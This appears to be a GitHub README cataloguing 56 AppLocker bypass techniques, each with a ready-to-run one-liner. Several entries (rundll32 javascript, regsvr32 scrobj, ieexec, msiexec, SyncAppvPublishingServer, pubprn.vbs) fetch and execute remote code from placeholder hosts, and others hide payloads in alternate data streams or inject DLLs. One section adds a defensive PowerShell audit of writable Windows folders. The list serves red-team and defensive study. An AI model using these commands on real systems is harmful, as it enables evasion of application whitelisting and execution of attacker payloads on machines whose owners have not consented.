# myAPPLockerBypassSummary
Simple AppLocker bypass summary based on the extensive work of @api0cradle

--------------------------------------------------------------------------
1. Rundll32.exe

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://ip:port/",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")

rundll32 shell32.dll,Control_RunDLL payload.dll

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: No

Notes:
I only tested this on Windows 10 against the default rules; it could work against older Windows versions.
http://ip:port/ in the first and third one-liners is a placeholder for your own listener. The third one fetches JScript over WinHttp, evals it, and kills rundll32.exe if the fetch fails. The last line loads an arbitrary DLL through the Control_RunDLL export of shell32.dll.

* Links:
* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

--------------------------------------------------------------------------
2. Regsvr32.exe

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: No

Notes:
I only tested this on Windows 10 against the default rules; it could work against older Windows versions.
/i: hands the scriptlet (.sct) URL to scrobj.dll's DllInstall, which fetches and runs it; /n skips DllRegisterServer and /u selects the uninstall path, so nothing is written to the registry.

* Links:
* https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md

--------------------------------------------------------------------------
3. Msbuild.exe

msbuild.exe pshell.xml

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: Yes

Notes:
pshell.xml is an MSBuild project whose inline task (UsingTask with a Code element) is compiled and executed by MSBuild itself, so no separate binary is launched.

* Links:
* https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614
* http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html
* https://github.com/Cn33liz/MSBuildShell
* https://github.com/Cn33liz/MS17-012
* https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
* https://www.youtube.com/watch?v=aSDEAPXaz28
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

--------------------------------------------------------------------------
4. Regsvcs.exe

regsvcs.exe /U regsvcs.dll

regsvcs.exe regsvcs.dll

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: Yes

Notes:
regsvcs.dll is a .NET assembly; its [ComRegisterFunction]/[ComUnregisterFunction] methods run during registration and unregistration, and the /U (unregister) path works without admin.

* Links:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

--------------------------------------------------------------------------
5. Regasm.exe

regasm.exe /U regsvcs.dll

regasm.exe regsvcs.dll

* Requires admin: No with /U (unregister); registering without /U needs admin
* Windows binary: Yes
* Bypasses AppLocker Default rules: Yes

Notes:
Same assembly and same [ComRegisterFunction]/[ComUnregisterFunction] trick as Regsvcs.exe.

* Links:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

--------------------------------------------------------------------------
6. Bginfo.exe

bginfo.exe bginfo.bgi /popup /nolicprompt

* Requires admin: No
* Windows binary: No
* Bypasses AppLocker Default rules: No

Notes:
Will work if BGinfo.exe is located in a path that is trusted by the policy. The .bgi configuration carries VBScript that BGinfo executes.

* Links:
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/

--------------------------------------------------------------------------
7. InstallUtil.exe

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: Yes

Notes:
/U runs the Uninstall method of the Installer class in the assembly, which is where the payload lives; /logfile= /LogToConsole=false suppress the log output.

* Links:
* https://github.com/subTee/AllTheThings
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
* http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
* https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

--------------------------------------------------------------------------
8. MSDT.exe

Open .diagcab package

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
A .diagcab troubleshooting pack contains PowerShell scripts that msdt.exe runs when the package is opened.

* Links:
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

--------------------------------------------------------------------------
9. mshta.exe

mshta.exe evilfile.hta

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: Yes

Notes:
.hta is not one of the extensions AppLocker script rules cover, and mshta.exe lives in System32, which the default rules allow.

* Links:
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

--------------------------------------------------------------------------
10. Execute .Bat

cmd.exe /k < script.txt

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: No

Notes:
The batch content lives in a .txt file fed to cmd.exe on stdin; AppLocker script rules only apply to .ps1, .bat, .cmd, .vbs and .js files.

* Links:
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

--------------------------------------------------------------------------
11. Execute .PS1

Get-Content script.txt | iex

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: No

Notes:
Same idea as above: the PowerShell code is read from a .txt file and piped to Invoke-Expression instead of being run as a .ps1.

* Links:
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

--------------------------------------------------------------------------
12. Execute .VBS

cscript.exe //E:vbscript script.txt

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: No

Notes:
//E:vbscript forces the VBScript engine for a file whose extension is not .vbs.

* Links:
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

--------------------------------------------------------------------------
13. PresentationHost.exe

Missing example

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:

* Links:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

--------------------------------------------------------------------------
14. dfsvc.exe

Missing example

* Requires admin: ?
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:

* Links:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf

--------------------------------------------------------------------------
15. IEExec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

* Requires admin: ?
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
ieexec.exe ships with the .NET Framework and downloads and runs a .NET executable from the given URL.

* Links:
* https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

--------------------------------------------------------------------------
16. cdb.exe

cdb.exe -cf x64_calc.wds -o notepad.exe

* Requires admin: ?
* Windows binary: No
* Bypasses AppLocker Default rules: ?

Notes:
cdb.exe is part of Debugging Tools for Windows; the .wds debugger script writes shellcode into the debuggee (notepad.exe here) and runs it.

* Links:
* http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

--------------------------------------------------------------------------
17. dnx.exe

dnx.exe consoleapp

* Requires admin: ?
* Windows binary: No
* Bypasses AppLocker Default rules: ?

Notes:
dnx.exe is the execution host of the pre-1.0 .NET Core toolchain; it compiles and runs the consoleapp project from source.

* Links:
* https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

--------------------------------------------------------------------------
18. rcsi.exe

rcsi.exe bypass.csx

* Requires admin: ?
* Windows binary: No
* Bypasses AppLocker Default rules: ?

Notes:
rcsi.exe is the Roslyn C# script runner; the .csx file is compiled and run in memory.

* Links:
* https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

--------------------------------------------------------------------------
19. csi.exe

Missing example

* Requires admin: ?
* Windows binary: No
* Bypasses AppLocker Default rules: ?

Notes:
csi.exe is the C# interactive shell that ships with Visual Studio and takes .csx scripts like rcsi.exe.

* Links:
* https://web.archive.org/web/20161008143428/http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html

--------------------------------------------------------------------------
20. CPL loading location manipulation

Control.exe

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
Control Panel items are DLLs (.cpl); the per-user registry keys that tell control.exe where to find them can be pointed at a DLL in a user-writable location.

* Links:
* https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
* https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/

--------------------------------------------------------------------------
21. msxsl.exe

msxsl.exe customers.xml script.xsl

* Requires admin: No
* Windows binary: No
* Bypasses AppLocker Default rules: ?

Notes:
msxsl.exe applies script.xsl to customers.xml; an msxsl:script block in the stylesheet (JScript or VBScript) is executed during the transform.

* Links:
* https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
* https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1
* https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
* https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/

--------------------------------------------------------------------------
22. msiexec.exe

msiexec /quiet /i cmd.msi

msiexec /q /i http://192.168.100.3/tmp/cmd.png

* Requires admin: ?
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
The second form fetches the package over HTTP; the .png extension is irrelevant to msiexec, which only looks at the file content.

* Links:
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/

--------------------------------------------------------------------------
23. cmstp.exe

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
The INF's RunPreSetupCommands section runs arbitrary commands during the (silent, /s) profile install. Can also execute scriptlets:
https://twitter.com/NickTyrer/status/958450014111633408
https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80

* Links:
* https://msitpros.com/?p=3960
* https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e

--------------------------------------------------------------------------
24. xwizard.exe

xwizard.exe argument1 argument2

When copied to another folder, xwizard.exe loads xwizard.dll from that folder (DLL search-order hijack).

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:

* Links:
* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/

--------------------------------------------------------------------------
25. fsi.exe

fsi.exe c:\folder\d.fscript

* Requires admin: No
* Windows binary: No
* Bypasses AppLocker Default rules: ?

Notes:
fsi.exe is F# Interactive (Visual Studio / F# SDK); it runs the script file it is given.

* Links:
* https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
* https://twitter.com/NickTyrer/status/904273264385589248
* https://docs.microsoft.com/en-us/dotnet/fsharp/tutorials/fsharp-interactive/

--------------------------------------------------------------------------
26. odbcconf.exe

odbcconf -f file.rsp

* Requires admin: ?
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
The .rsp response file carries odbcconf commands; REGSVR loads the named DLL.

* Links:
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b

--------------------------------------------------------------------------
27. te.exe

te.exe bypass.wsc

* Requires admin: No
* Windows binary: No
* Bypasses AppLocker Default rules: ?

Notes: Can be used if the Test Authoring and Execution Framework is installed and is in a path that is allowed by the policy.
Default location is: C:\program files (x86)\Windows Kits\10\testing\Runtimes\TAEF

* Links:
* https://twitter.com/gN3mes1s/status/927680266390384640
* https://gist.github.com/N3mes1s/5b75a4cd6aa4d41bb742acace2c8ab42

--------------------------------------------------------------------------
28. Placing files in writeable paths under c:\windows

The following folders are by default writable by standard users, and because they sit under %WINDIR% they are covered by the default "All files located in the Windows folder" allow rule:

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys

C:\Windows\System32\spool\drivers\color

C:\Windows\Tasks

C:\windows\tracing

* Requires admin: No
* Windows binary: N/A
* Bypasses AppLocker Default rules: ?
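The check a defender wants for the list above is "which directories under C:\Windows can a standard user write to on this build, and would AppLocker let an .exe dropped there run?". The following PowerShell is an added example, not code from this list or from @api0cradle. It enumerates directories whose ACL grants a low-privilege group the CreateFiles right (the PowerShell equivalent of the accesschk check mentioned in the notes), then drops a zero-byte probe .exe into each hit and asks the effective policy for a decision. $Root, $LowPrivGroups and the probe file name are assumptions; run it as an ordinary user, not elevated, so the view matches what an attacker gets.

```powershell
# Added example; not code from the original list or from @api0cradle.
# Finds directories under $Root that a standard user can create files in, then
# probes each one against the effective AppLocker policy. Assumptions: $Root,
# $LowPrivGroups, probe file name. Run as a normal (non-admin) user.

$Root = 'C:\Windows'
$LowPrivGroups = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                 'Everyone', 'NT AUTHORITY\INTERACTIVE'
# CreateFiles (0x2) is the bit that lets a principal add a file to a directory;
# Write, Modify and FullControl all include it.
$CreateFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles

function Get-LowPrivWritableDirectory {
    param([string] $Path = $Root)
    Get-ChildItem -LiteralPath $Path -Directory -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $acl = Get-Acl -LiteralPath $_.FullName -ErrorAction SilentlyContinue
            if (-not $acl) { return }
            # Allow ACEs only. Deny ACEs and generic rights from parents are not
            # evaluated here; the probe below settles what the ACL view cannot.
            $allow = @($acl.Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $LowPrivGroups -contains $_.IdentityReference.Value -and
                (([int]$_.FileSystemRights) -band $CreateFiles) -ne 0
            })
            if ($allow.Count -gt 0) {
                [pscustomobject]@{
                    Directory = $_.FullName
                    GrantedTo = (@($allow | ForEach-Object { $_.IdentityReference.Value }) |
                                 Sort-Object -Unique) -join ', '
                }
            }
        }
}

function Test-DropAndExecute {
    # Creates and removes probe-<guid>.exe in each directory. The file is empty,
    # so only path rules (the default rules are path rules) matter for the decision.
    param([Parameter(Mandatory, ValueFromPipeline)] [string] $Directory)
    begin {
        try { $policy = Get-AppLockerPolicy -Effective -ErrorAction Stop }
        catch { throw "No effective AppLocker policy could be read: $($_.Exception.Message)" }
    }
    process {
        $probe = Join-Path $Directory ('probe-{0}.exe' -f [guid]::NewGuid())
        try {
            New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null   # real write test
            $result   = $policy | Test-AppLockerPolicy -Path $probe -User Everyone
            $decision = '{0} ({1})' -f $result.PolicyDecision, $result.MatchingRule
        } catch {
            $decision = 'not writable: ' + $_.Exception.Message
        } finally {
            Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        }
        [pscustomobject]@{ Directory = $Directory; ExeDecision = $decision }
    }
}

$writable = @(Get-LowPrivWritableDirectory)
$writable | Format-Table -AutoSize
$writable | Select-Object -ExpandProperty Directory | Test-DropAndExecute | Format-Table -AutoSize
```

Any directory that comes back "Allowed" is one where the default allow rule for %WINDIR% does real damage: add a deny (or exception) rule for it, as the default rules ship without one. The probe touches the file system, so expect it to show up in EDR telemetry, and note that it does not cover the alternate-data-stream variants in sections 44 and 45, which need a user-writable file rather than a directory.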

Notes: This list is based on Windows 10 1709. Run accesschk (for example accesschk.exe -uwdqs Users C:\Windows) to verify on other Windows versions.

--------------------------------------------------------------------------
29. Atbroker.exe

ATBroker.exe /start malware

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
The payload first has to be registered as an Assistive Technology in the registry under the name given to /start (see link).

* Links:
* http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/

--------------------------------------------------------------------------
30. WMIC.exe

wmic process call create calc

wmic process get brief /format:"https://www.example.com/file.xsl"

wmic os get /format:"MYXSLFILE.xsl"

wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
/format: loads an XSL stylesheet from a local path, a UNC share or a URL, and any script embedded in it is executed while the output is rendered.

* Links:
* https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
* https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
* https://gist.githubusercontent.com/caseysmithrc/68924cabbeca1285d2941298a5b91c24/raw/8574e0c019b17d84028833220ed0b30cf9eea84b/minimalist.xsl

--------------------------------------------------------------------------
31. MavInject32.exe

MavInject32.exe /INJECTRUNNING

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
Full syntax is MavInject32.exe <PID> /INJECTRUNNING <path to dll>; it injects the DLL into the running process with that PID.

* Links:
* https://twitter.com/gN3mes1s/status/941315826107510784
* https://twitter.com/Hexacorn/status/776122138063409152

--------------------------------------------------------------------------
32. Pubprn.vbs

cscript pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
pubprn.vbs lives in C:\Windows\System32\Printing_Admin_Scripts\en-US\ and passes its second argument to GetObject(), so a script: moniker runs the remote scriptlet.

* Links:
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/

--------------------------------------------------------------------------
33. slmgr.vbs

slmgr.vbs

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes: Requires writing the registry keys for a COM object the script instantiates under HKCU (COM hijack), which needs no admin rights.

* Links:
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://www.youtube.com/watch?v=3gz1QmiMhss

--------------------------------------------------------------------------
34. winrm.vbs

winrm quickconfig

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes: Requires writing the registry keys for a COM object the script instantiates under HKCU (COM hijack), which needs no admin rights.

* Links:
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://www.youtube.com/watch?v=3gz1QmiMhss

--------------------------------------------------------------------------
35. forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
/c runs the given command once per file matched by /p and /m; the match is only there to trigger the execution.

* Links:
* https://twitter.com/vector_sec/status/896049052642533376

--------------------------------------------------------------------------
36. SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
The argument ends up inside a PowerShell command run by the binary's own hosted PowerShell engine (System.Management.Automation), not by powershell.exe; the leading n; satisfies the "name;URL" format the binary expects.

* Links:
* https://twitter.com/monoxgas/status/895045566090010624

--------------------------------------------------------------------------
37. InfDefaultInstall.exe

InfDefaultInstall.exe shady.inf

* Requires admin: ?
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
Only works on Windows 7? Windows 10 requires admin or a digital signature.

* Links:
* https://twitter.com/KyleHanslovan/status/911997635455852544
* https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
* https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/

--------------------------------------------------------------------------
38. Winword.exe

winword.exe /l dllfile.dll

* Requires admin: No
* Windows binary: No (ships with Microsoft Office)
* Bypasses AppLocker Default rules: ?

Notes: /l loads the given DLL as a Word add-in; no public example DLL is provided.

* Links:
* https://twitter.com/subTee/status/884615369511636992

--------------------------------------------------------------------------
39. Runscripthelper.exe

runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
Runs the PowerShell in the given file; the Microsoft\Diagnosis\scripts path component is required by the binary, which is why the example uses that directory layout.

* Links:
* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc

--------------------------------------------------------------------------
40. Tracker.exe

Tracker.exe /d .\calc.dll /c C:\Windows\write.exe

* Requires admin: No
* Windows binary: No
* Bypasses AppLocker Default rules: ?

Notes:
Part of Visual Studio. /d injects the DLL into the process started with /c.
Requires TrackerUI.dll present in the 1028 subfolder.

* Links:
* https://twitter.com/Sudhanshu_C/status/943011972261412864

--------------------------------------------------------------------------
41. .WSF files

script.wsf

* Requires admin: No
* Windows binary: No
* Bypasses AppLocker Default rules: ?

Notes:
.wsf is not among the extensions AppLocker script rules cover (.ps1, .bat, .cmd, .vbs, .js), so a .wsf file is not blocked even though wscript.exe runs the VBScript/JScript inside it.

* Links:

--------------------------------------------------------------------------
42. PowerShell version 2

Powershell -version 2

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
Bypasses Constrained Language Mode: the v2 engine does not implement it, so AppLocker's script enforcement no longer restricts the session.

* Links:

--------------------------------------------------------------------------
43. CL_Invocation.ps1

. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1

SyncInvoke [args]

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: Yes, as long as PowerShell version 2 is present

Notes:
Requires PowerShell version 2. The script ships in a default-allowed Windows path and exports SyncInvoke, which starts the given command.

* Links:
* https://twitter.com/bohops/status/948548812561436672

--------------------------------------------------------------------------
44. Incorrect permissions on files in folders

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: Yes

Notes:
The log file sits under Program Files, which the default path rule allows, but is writable by users, so the payload is stored as an alternate data stream of it and started from there.

* Links:
* https://twitter.com/Oddvarmoe/status/951757732557852673

--------------------------------------------------------------------------
45. Control.exe - Loading DLL/CPL binary from Alternate data stream

type notepad_reflective_x64.dll > c:\windows\tasks\zzz:notepad_reflective_x64.dll
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
Requires write access to a place that is allowed by AppLocker (C:\Windows\Tasks from section 28 in this example).

* Links:
* https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
* https://twitter.com/bohops/status/955659561008017409

--------------------------------------------------------------------------
46. Advpack.dll - LaunchINFSection

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: Yes

Notes:
Processes the named INF section; the linked test.inf registers a remote scriptlet that way.

* Links:
* https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
* https://twitter.com/bohops/status/967486047839014913
* https://gist.githubusercontent.com/bohops/693dd4d5dbfb500f1c3ace02622d5d34/raw/902ed953a9188b27e91c199b465cddf855c7b94f/test.inf

--------------------------------------------------------------------------
47. Advpack.dll - RegisterOCX

rundll32.exe advpack.dll,RegisterOCX calc.exe

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: Yes

Notes:
RegisterOCX is meant to register a control but simply executes the path it is given.

* Links:
* https://twitter.com/Moriarty_Meng/status/977848311603380224

--------------------------------------------------------------------------
48. zipfldr.dll - RouteTheCall

rundll32.exe zipfldr.dll,RouteTheCall calc.exe

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: Yes

Notes:
RouteTheCall shell-executes the argument.

* Links:
* https://twitter.com/Moriarty_Meng/status/977848311603380224

--------------------------------------------------------------------------
49. url.dll - OpenURL

rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
rundll32.exe url.dll,OpenURL "C:\test\calc.url"

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
OpenURL opens the argument with its registered handler, so an .hta runs via mshta.exe and a .url shortcut launches whatever its URL= line points at.

* Links:
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/

--------------------------------------------------------------------------
50. url.dll - FileProtocolHandler

rundll32.exe url.dll,FileProtocolHandler calc.exe

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
FileProtocolHandler shell-executes the argument.

* Links:
* http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/

--------------------------------------------------------------------------
51. ieframe.dll - OpenURL

rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
Same behaviour as url.dll,OpenURL (section 49), via a different DLL.

* Links:
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/

--------------------------------------------------------------------------
52. shdocvw.dll - OpenURL

rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
Same behaviour as url.dll,OpenURL (section 49), via a different DLL.

* Links:
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/

--------------------------------------------------------------------------
53. ieadvpack.dll - LaunchINFSection

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
Same export as advpack.dll (section 46); with the section name left empty the DefaultInstall section is used.

* Links:
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

--------------------------------------------------------------------------
54. ie4uinit.exe

ie4uinit.exe -BaseSettings

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: No

Notes:
Requires copying ie4uinit.exe and ieuinit.inf to a user-controlled folder, because the binary reads ieuinit.inf from its own directory.
The scriptlet (SCT) reference is added in the MSIE4RegisterOCX.Windows7 section of that ieuinit.inf.

* Links:
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

--------------------------------------------------------------------------
55. Visual Studio Tools for Office - .VSTO files

evilfile.vsto

* Requires admin: No
* Windows binary: No (VSTOInstaller.exe ships with the VSTO runtime / Office, not Windows)
* Bypasses AppLocker Default rules: ?

Notes:
You need to build a solution using Visual Studio Tools for Office.
The user needs to confirm the installation prompt after executing.

* Links:
* https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/

--------------------------------------------------------------------------
56. Manage-bde.wsf

cscript c:\windows\system32\manage-bde.wsf

* Requires admin: No
* Windows binary: Yes
* Bypasses AppLocker Default rules: ?

Notes:
The script shells out through %COMSPEC%, so point that variable at the binary you want run first: set comspec=c:\windows\system32\calc.exe

* Links:
* https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
